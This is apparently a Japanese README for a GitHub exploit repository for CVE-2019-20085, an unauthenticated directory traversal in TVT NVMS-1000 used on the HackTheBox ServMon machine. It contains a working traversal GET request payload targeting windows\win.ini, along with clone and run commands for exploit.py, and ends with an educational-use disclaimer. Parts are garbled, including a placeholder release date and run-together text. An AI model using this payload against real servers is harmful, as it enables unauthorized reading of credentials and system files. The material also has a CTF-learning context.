
Hackthebox ServMon Machineに使用されるリポジトリ
作者: Z3R0 CVE: CVE-2019-20085 対象: TVT NVMS-1000(パッチ以前の全ての既知バージョン) 脆弱性の種類: 認証不要のディレクトリトラバーサル 日付: [リリース日を挿入]
TVTのNVMS-1000ソフトウェアは、Webサーバーコンポーネントにディレクトリトラバーサルの脆弱性を含んでいます。/..シーケンスを使用した特別に細工されたGETリクエストを送信することで、認証されていない攻撃者は、機密設定ファイル、パスワードハッシュ、システムキーなど、基盤となるOS上の任意のファイルにアクセスできます。
このエクスプロイトは、NVMS-1000上で動作するHTTPサーバーの脆弱なファイルパス解決を悪用します。認証は必要ありません。リモートの攻撃者は、サービスユーザーがアクセス可能な任意のファイルを読み取ることができます。
GET /..%5C..%5C..%5C..%5Cwindows%5Cwin.ini HTTP/1.1
Host: <target-ip>:80
C:\Windows\win.ini)requestsモジュール(pip install requests)git clone https://github.com/Z3R0-0x30/CVE-2019-20085.git
cd CVE-2019-20085
python3 exploit.py http://domain.local/ ../../windows/win.ini win.ini"
このエクスプロイトは、教育および許可されたセキュリティ研究目的のみで公開されています。 作者のZ3R0は、不正使用や不正アクセスについて一切の責任を負いません。 システムをテストする前に、必ず適切な許可を得てください。